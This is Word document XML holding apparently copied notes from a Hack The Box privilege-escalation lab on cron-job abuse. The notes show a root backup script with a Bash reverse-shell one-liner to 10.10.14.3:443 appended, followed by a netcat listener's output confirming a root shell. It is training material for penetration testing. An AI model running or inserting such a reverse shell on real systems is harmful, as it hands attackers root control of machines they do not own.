    <w:p w14:paraId="143247EA"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We can look at the shell script and append a command to it to attempt to obtain a reverse shell as root. If editing a script, make sure to </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ALWAYS</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> take a copy of the script and/or create a backup of it. We should also attempt to append our commands to the end of the script to still run properly before executing our reverse shell command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FD8DD5"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yovecio@htb[/htb]$ cat /dmz-backups/backup.sh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05371C91"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2E4FA7A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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DF049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SRCDIR="/var/www/html"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BED4D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DESTDIR="/dmz-backups/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F71ADD"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FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCE47F6"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tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AB5A45"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 xml:space="preserve">We can see that the script is just taking in a source and destination directory as variables. It then specifies a file name with the current date and time of backup and creates a tarball of the source directory, the web root directory. Let's modify the script to add a </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00726ABF">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Bash one-liner reverse shell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2E1DC" w14:textId="77777777" w:rsidR="00726ABF" w:rsidRPr="00726ABF" w:rsidRDefault="00726ABF" w:rsidP="00726ABF">
      <w:pPr>
        <w:spacing w:after="0"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Code: bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508F71C3"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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0C329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SRCDIR="/var/www/html"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FC874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DESTDIR="/dmz-backups/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DF1EF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FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B2BD1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tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780D2EBC"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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC6ED8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bash -i &gt;&amp; /dev/tcp/10.10.14.3/443 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6692A74F" w14:textId="77777777" w:rsidR="00726ABF" w:rsidRPr="00726ABF" w:rsidRDefault="00726ABF" w:rsidP="00726ABF">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lastRenderedPageBreak/>
        <w:t xml:space="preserve">We modify the script, stand up a local </w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener, and wait. Sure enough, within three minutes, we have a root shell!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2329710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yovecio@htb[/htb]$ nc -lnvp 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E289B1"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18C904D9"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listening on [any] 443 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CBBF7D"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connect to [10.10.14.3] from (UNKNOWN) [10.129.2.12] 38882</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7E034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bash: cannot set terminal process group (9143): Inappropriate ioctl for device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36500E1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bash: no job control in this shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383844C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61B3F67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root@NIX02:~# id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50020698"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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C3E23C"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uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCB2304"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450B16D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root@NIX02:~# hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5576F28B"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hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F439530" w14:textId="77777777" w:rsidR="00726ABF" w:rsidRPr="00726ABF" w:rsidRDefault="00726ABF" w:rsidP="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726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>NIX02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA984C2" w14:textId="379F4F6C" w:rsidR="00213442" w:rsidRPr="00A511E4" w:rsidRDefault="00726ABF" w:rsidP="00A511E4">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726ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>While not the most common attack, we do find poorly configured cron jobs that can be abused from time to time.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00213442" w:rsidRPr="00A51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B7"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="005665B7"/>
    <w:rsid w:val="00726ABF"/>
    <w:rsid w:val="00A511E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9DFAE0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{50D86AEC-DBC4-4FA0-AF9C-1A19D46F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A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BF"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00726ABF"/>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TMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00726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726AB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726ABF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-gray">
    <w:name w:val="text-gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00726ABF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00726ABF"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00726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00398">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2036686685">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1713309369">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="397704612">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="80034324">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2054619841">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="590283399">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="494220992">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="882984068">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="819662632">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="180705037">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1924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7510">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="21200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ntestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-she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n7.org/linux/man-pages/man5/procfs.5.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Procfs" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DominicBreuker/psp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2023-08-02T12:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-02T12:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>